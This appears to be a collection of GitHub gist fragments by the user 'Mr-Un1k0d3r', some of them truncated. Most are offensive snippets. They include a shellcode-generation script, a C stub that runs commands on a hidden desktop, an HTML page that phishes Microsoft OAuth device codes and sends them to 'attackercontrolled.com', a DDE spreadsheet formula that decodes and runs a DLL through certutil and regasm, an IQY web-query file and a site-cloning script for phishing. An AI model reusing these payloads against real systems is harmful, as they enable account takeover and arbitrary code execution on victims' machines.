Mr-Un1k0d3r

# Usage:
# ./generate.sh file.o
# \x0f\x01\x..
# ./generate.sh file.o ,0x
# ,0x0f,0x01,0x..

#!/bin/bash
DELIMITER=$2

if [ -z "$DELIMITER" ]

Mr-Un1k0d3r

// To compile: gcc64.exe run.c -o run.exe
// To run:     run.exe cmd.exe "/c whoami"

#include <Windows.h>
#include <stdio.h>

int main(int argc, char **argv) {

    CHAR cDesktop[] = "hiddendesktop";
    HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);

Mr-Un1k0d3r

<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>

$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
	
	$.get("https://attackercontrolled.com/?id=" + data.device_code);
	document.write(data.message);
});
</script>

Mr-Un1k0d3r

=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'

Mr-Un1k0d3r

WEB
1
https://ringzer0team.com/IQY

Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False

Mr-Un1k0d3r

#!/bin/bash
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"

Mr-Un1k0d3r

Keybase proof

I hereby claim:

• I am Mr-Un1k0d3r on github.
• I am mrun1k0d3r (https://keybase.io/mrun1k0d3r) on keybase.
• I have a public key whose fingerprint is B6EC B08B 2E02 722D 719E F173 83C5 5463 945D 2EA6

To claim this, I am signing this object: